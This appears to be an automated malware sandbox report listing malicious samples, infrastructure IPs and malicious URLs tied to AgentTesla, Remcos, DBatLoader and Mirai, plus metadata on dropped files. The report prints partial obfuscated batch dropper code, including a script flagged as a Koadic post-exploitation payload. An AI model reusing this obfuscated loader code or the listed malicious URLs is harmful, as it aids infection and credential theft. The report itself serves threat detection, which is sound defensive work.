dual-spov-0006.spov-msedge.net | UGS - CRO REQ - KHIDUBAI (OPL-841724).scr | malicious | PureLog Stealer, zgRAT | 13.107.137.11
dual-spov-0006.spov-msedge.net | SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader | 13.107.139.11
dual-spov-0006.spov-msedge.net | 2020.xls | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | Signed Proforma Invoice 3645479_pdf.vbs | malicious | FormBook | 13.107.139.11

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ARUBA-ASNIT | #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk | malicious | Unknown | 89.46.106.29
ARUBA-ASNIT | 2x6j7GSmbu.exe | malicious | FormBook | 62.149.189.71
ARUBA-ASNIT | EYhvUxUIsT.elf | malicious | Mirai | 95.110.130.125
ARUBA-ASNIT | 2EFEN3j6ml.elf | malicious | Unknown | 80.211.52.147
ARUBA-ASNIT | PhvvLCLFym.elf | malicious | Mirai | 95.110.143.4
ARUBA-ASNIT | HfuP5Csj29.elf | malicious | Mirai | 31.14.139.42
ARUBA-ASNIT | UGXRHW5XnG.elf | malicious | Mirai | 217.73.230.186
ARUBA-ASNIT | Gq730kmpiE.elf | malicious | Unknown | 188.213.171.76
ARUBA-ASNIT | uvaXiyELu9.elf | malicious | Mirai | 212.237.50.240
ARUBA-ASNIT | lUJIhHyHmC.elf | malicious | Mirai, Moobot | 5.249.139.193
UNIFIEDLAYER-AS-1US | CREDIT NOTE.exe | malicious | AgentTesla | 192.185.129.60
UNIFIEDLAYER-AS-1US | Total Invoices.exe | malicious | AgentTesla | 192.185.129.60
UNIFIEDLAYER-AS-1US | knfV5IVjEV.lnk | malicious | Unknown | 162.241.216.65
UNIFIEDLAYER-AS-1US | http://www.noahsarkademy.com | malicious | Unknown | 69.49.230.31
UNIFIEDLAYER-AS-1US | CR-FEDEX_TN-775720741041.vbs | malicious | AgentTesla, GuLoader | 192.185.13.234
UNIFIEDLAYER-AS-1US | Wire Transfer Payment Receipt#2024-22-04.exe | malicious | AgentTesla | 162.144.15.164
UNIFIEDLAYER-AS-1US | DHL_RF_20200712_BN_OTN 0095673441.vbs | malicious | AgentTesla, GuLoader | 192.185.13.234
UNIFIEDLAYER-AS-1US | https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370 | malicious | Unknown | 162.241.225.201
UNIFIEDLAYER-AS-1US | DHL INVOICE.scr.exe | malicious | AgentTesla | 192.185.171.184
UNIFIEDLAYER-AS-1US | PO No. 2430800015.exe | malicious | AgentTesla | 162.241.225.141
MICROSOFT-CORP-MSN-AS-BLOCKUS | 3Shape Unite Installer.exe | malicious | Unknown | 40.67.232.186
MICROSOFT-CORP-MSN-AS-BLOCKUS | OHkRFujs2m.exe | malicious | Unknown | 104.208.16.94
MICROSOFT-CORP-MSN-AS-BLOCKUS | SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exe | malicious | PureLog Stealer, zgRAT | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://wmicrosouab-4ba8.udydzj.workers.dev/ | malicious | HTMLPhisher | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://uqgekpc20qn1.azureedge.net/6466/ | malicious | TechSupportScam | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2w | malicious | HtmlDropper, HTMLPhisher |
                                                                                  • 13.89.178.26
                                                                                  https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2wGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.136.10
                                                                                  https://condoresorts.com/Get hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.69
                                                                                  https://u44058082.ct.sendgrid.net/ls/click?upn=u001.wjMLvmoK1OC9dTKy5UL4VbqcIJmZWkGKJypB0ZF6j6rXk8HVnxe0g2af-2BenroUoONz6EEWthgE-2Bi2vVRUosKTZRVQ5v63hCdxrdKCztVooIv51imK8tr-2Bb3beAsH6u-2FNluJlUKmd7nST-2B9m-2Bl2Rgv4y6uHLimO0TjhZzZ-2F-2BDlllJQne3tT99z6x4W12pJpddTL-2BoJ2-2Bdo6961pFN3dV2Rg-3D-3DeWGT_h-2FW4DSvZGhKY-2FmU3Rq-2F3L-2FXo2OZSHdaVvlpgAgHQWDXPYB9CNYi-2FcvonFCbsEhjt9RP-2BQa7dTwbMJOOaP3JRnMW6mQAitl6qAb1EkaAR-2BmnZDE6Bi3ooqtCrrMW-2F3TPNMK3AVi1YKIdTOZivmUJGaXdrtbqCykfnTTkN9KMRy80rdRqf6LWUCYWGeeaXb-2BD6jokMbr-2FaJKvKMHDNWAfHyhaE6QO9pw7souFUseKb40g-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 52.96.189.2
                                                                                  zlONcFaXkc.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                                                  • 23.101.168.44
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  • 89.46.106.29
                                                                                  ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  • 89.46.106.29
                                                                                  X1.exeGet hashmaliciousXWormBrowse
                                                                                  • 89.46.106.29
                                                                                  Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                  • 89.46.106.29
                                                                                  a0e9f5d64349fb13191bc781f81f42e1OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                  • 13.107.139.11
                                                                                  z56NF-Faturada-23042024.msiGet hashmaliciousMicroClipBrowse
                                                                                  • 13.107.139.11
                                                                                  768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  iPUk65i3yI.exeGet hashmaliciousLummaCBrowse
                                                                                  • 13.107.139.11
                                                                                  asbpKOngY0.exeGet hashmaliciousLummaCBrowse
                                                                                  • 13.107.139.11
                                                                                  VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.139.11
                                                                                  https://www.epa.gov/climateleadership/simplified-ghg-emissions-calculatorGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  37f463bf4616ecd445d4a1937da06e19DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  181_960.msiGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                  • 89.46.106.29
                                                                                  mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\Public\Libraries\easinvoker.exeHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                      VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          Purchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            Quotation 20242204.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                      C:\Users\Public\Libraries\bwsiuvcU.pifORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                        RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                          20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                            disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                              82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.25660.20544.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  SecuriteInfo.com.Win32.Evo-gen.15258.6765.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    rKjlbIeOH9.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                      CONFIRMATION ORDER1.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                        CONFIRMATION ORDER0.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.7067168232326468
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqN:2JIB/wUKUKQncEmYRTwh0p
                                                                                                                          MD5:8107C44FFAE18504731873FF06C8ABE1
                                                                                                                          SHA1:C07323DF119B7CB044660066615A03D5BFFF550C
                                                                                                                          SHA-256:D763396AE855BCF39008DD03A914A059DEC87C400398F3A1A442C27E2B8F0F8E
                                                                                                                          SHA-512:A1C1A28EDDBC74D95ECB092184A5F268F4995602CF3BA0E187C67E7B480F83D83B4DBA7D21C5EA9A3639F79F10BB1719468EA4CF9CD647A5048CFC8B0370EFF5
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5990b467, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.7900120382330043
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
                                                                                                                          MD5:87B55928FC615D66251922BB21FFFF71
                                                                                                                          SHA1:02057BCCD711301E9457B0625F94230E2D5DF3EF
                                                                                                                          SHA-256:5A4FAB1A20F616FF00E04A119ED37139AAACC41DC3194FB451FBFF503D6D1F21
                                                                                                                          SHA-512:AA208B518015D51C2D578E1E65B4FC7408F9123CA144348D906B2D4B53BBD884FD2150DE9596825C16BCD98B920F8FA734F7F9C9C71D6CBC39DB9355AA8EB998
                                                                                                                          Malicious:false
                                                                                                                          Preview:Y..g... ...............X\...;...{......................0.`.....42...{5..-...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.......................................-...|...................;..-...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.08244686514367672
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:1ZlllyYeAc9hg1t/57Dek3Jh2IQlallEqW3l/TjzzQ/t:VllyzxhgHR3t2Amd8/
                                                                                                                          MD5:1278C12E3DCE809C7FE1D27BFD5B7B2B
                                                                                                                          SHA1:E130000151DBFEDC6C2E7D175A16FF39EBE73380
                                                                                                                          SHA-256:8C574CE134E618AB83C42537E68A97BFC0610A5320CC81E420829C596AE19B58
                                                                                                                          SHA-512:F78DAEAD1C0D4FA022B47AB8B94BB12FA6B38FFD4BDE4299DA499E58A23DBD77D5148B17B99312CBD0316676B6CDBF4CA1276E3C587C2AF7245D925E8B6E081F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.........................................;...{...-...|..42...{5.........42...{5.42...{5...Y.42...{59.................;..-...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3646
                                                                                                                          Entropy (8bit):5.383959173452972
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                          MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                          SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                          SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                          SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):2.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Bv:Z
                                                                                                                          MD5:6E7931A650D82FA4F83332BEBE8AD018
                                                                                                                          SHA1:311732BAD841789F43C3EF055A9FDF8A261AE4A8
                                                                                                                          SHA-256:CE60DA21A19E0A3D484FC4EE3F868999745B7F23475772EA8C87C7BDE54C4B43
                                                                                                                          SHA-512:BD7BBFA2722C680021FFA084438E4303283D866D24CE62BE842D4115C6094B4AA891CBBFCDB1CAD59D68A6A54649738EE4DB198DA3B5EEB25E07ACC5FD357426
                                                                                                                          Malicious:false
                                                                                                                          Preview:21..
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):599202
                                                                                                                          Entropy (8bit):7.05520368590051
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:6l/6EU9okQLUg90U56QKfIEhMfHU0MlXk5:6l/c9okkYUYHQEIHxMlXS
                                                                                                                          MD5:83DDE1E0DA8E837B3C94EE26FE5E9FE1
                                                                                                                          SHA1:7851FCC15BDBCE2DCB0565FE78F52DC879A14569
                                                                                                                          SHA-256:3183D63A4383372B36A88237E077FF92960605391CE897B55E3B0D4384A1FCCD
                                                                                                                          SHA-512:ADC2B0B71971AB1494AF4B90F0B6101E1BC4001F6A318ADE2651494E46E9DFDECF0594AB37E5A9886342F291A51A0508D96131EE62BE74D5FADFFD1B64070761
                                                                                                                          Malicious:true
                                                                                                                          Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa.*,8+'0:7$8458/=79'9+58*/;'4%8<9+5($=%,4;01496)/&09+'8-83$8.+(<<.=/(*5*-/<(4&79,'%(.9'*;):*19*-++:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa.&98,6:%29)KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa/*...1#q6)8.;;'@69...;;2.q'.+;4425...+'<q-1.?A1.'0...q*@:)8.%+4A/=...;-%.A(.,<A1&%...1-3$3*.?-%22:...q(/-37.q?=5.=...?(=5#/.1?-5A9....:-19;.'?A7$/...%,@053.q)#%A<...2-=#0/.2?.64,...$>/#q).0&A#0+...0'@2&0.A/@988...?,A288.)8/9(8...;+,@(,.5#)946...*>#&5-.=/@/2(...3$0#8*.)709'7...++&4&*./=2,4*...@)215+.*=?)54...3<A&4+.8....PPSL]]GD.f..mIG^<DH]\W"j....iOU\]SBTN.f.......NPZJZYSKV.O]RTS]BNZe...........m^.MT[.jYO_S.9GI.g\SIBZG4CO..MQZD]..EK]?V]NYMMOM1Q[UBBSTTO...........mccNeWWD.EUD.T]X[GQOG[.`B\`B.ZoHWP.oB`XGP.CC[`KCDKG.QTD]Y`XQV..........^YY`_R.Bp......eklXiVGB._JB W`G^UVBFEiT_U^OKC!Z`S..T[Y[^.H`S@EGP\Pl....phg^JC.RFXDOWLMLT,P7m.\EVV.c!..jghf. G\GROTQ.SQJHU.J4\]EG]^QE.....fhek!..ZYGD]N..]OGZHHH..fX.GCCp[CRlZTUFSC^Y[!RHII.VM.^GM..YQ.ER.LHSCLB`O....;nRNMg.GKV]FRFPRW.kni%....GFJPYM
Process:C:\Windows\SysWOW64\extrac32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1646592
Entropy (8bit):7.466963242088156
Encrypted:false
SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BwTQ+l04pEnlk8U2flxAu:NGup2B+K1mzywTQh4psG2Z
MD5:E6AC6CA27AA2D60DC59A21AF1FFDB086
SHA1:9F847E34521E8917C8B22ECA53B71306BC19AF18
SHA-256:A5B3CE892D48757DF98FEA906DFF92E0210DCBD8D1832E43DFBD2A5ECE61FBA1
SHA-512:9F4C1E3CB03CD1333A7F2E01F7A3D61803844FC4C1531DD432CC7B7DEDC5625D1253715200CB7E0F6B9C7F906A6DCBB488196153E1E2DC935B27B66D74431EE4
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 58%
• Antivirus: Virustotal, Detection: 38%
Process:C:\Users\user\AppData\Roaming\uc.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
Category:dropped
Size (bytes):30026
Entropy (8bit):3.9380000056299878
Encrypted:false
SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
MD5:828FFBF60677999579DAFE4BF3919C63
SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
Malicious:false
Yara Hits:
• Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\UcvuiswbO.bat, Author: ditekSHen
Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...
Process:C:\Users\user\AppData\Roaming\uc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):68096
Entropy (8bit):6.328046551801531
Encrypted:false
SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:C116D3604CEAFE7057D77FF27552C215
SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious
• Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious
• Filename: 20240416-703661.cmd, Detection: malicious
• Filename: disktop.pif.exe, Detection: malicious
• Filename: 82__GT7568.PDF.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious
• Filename: rKjlbIeOH9.exe, Detection: malicious
• Filename: CONFIRMATION ORDER1.bat, Detection: malicious
• Filename: CONFIRMATION ORDER0.bat, Detection: malicious
Process:C:\Users\user\AppData\Roaming\uc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):131648
Entropy (8bit):5.225468064273746
Encrypted:false
SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:231CE1E1D7D98B44371FFFF407D68B59
SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: HFiHWvPsvA.rtf, Detection: malicious
• Filename: payment swift.xls, Detection: malicious
• Filename: VdwJB2cS5l.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious
• Filename: Purchase order.exe, Detection: malicious
• Filename: Quotation 20242204.exe, Detection: malicious
• Filename: pSfqOmM1DG.exe, Detection: malicious
• Filename: XY2I8rWLkM.exe, Detection: malicious
• Filename: 2020.xls, Detection: malicious
• Filename: Quotation 20241804.exe, Detection: malicious
Process:C:\Users\user\AppData\Roaming\uc.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):115180
Entropy (8bit):5.090281411774507
Encrypted:false
SSDEEP:1536:iuuRxID3z1yUXtZKmsryc/o5jdePNtq8YCl7MbiRVRBfY+u:iuuRa/ZZK4c/UePNtq8nRBfY+u
MD5:6BAAEA4D3A65281B55173738795EB02C
SHA1:1FBE7EC7F5E2D1FB0AB1807E149EEE66A86F9224
SHA-256:0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1
SHA-512:AF0285CF961AEAE960EDE41F195809E9B84CCB262F17F2E994DA5C599EBDF712788E5A3F2E0E2ED16E67AA888BDABFD7A6096AD8DDA2D062D2F82B010E81D5C5
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%
• Antivirus: Virustotal, Detection: 47%
Process:C:\Users\user\AppData\Roaming\uc.exe
File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF">), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):100
Entropy (8bit):5.041307755889416
Encrypted:false
SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMDPhCSsb+Uo0Pjn:HRYFVmTWDyzuErbjn
MD5:64D91CB26E13C242023735D5311725A4
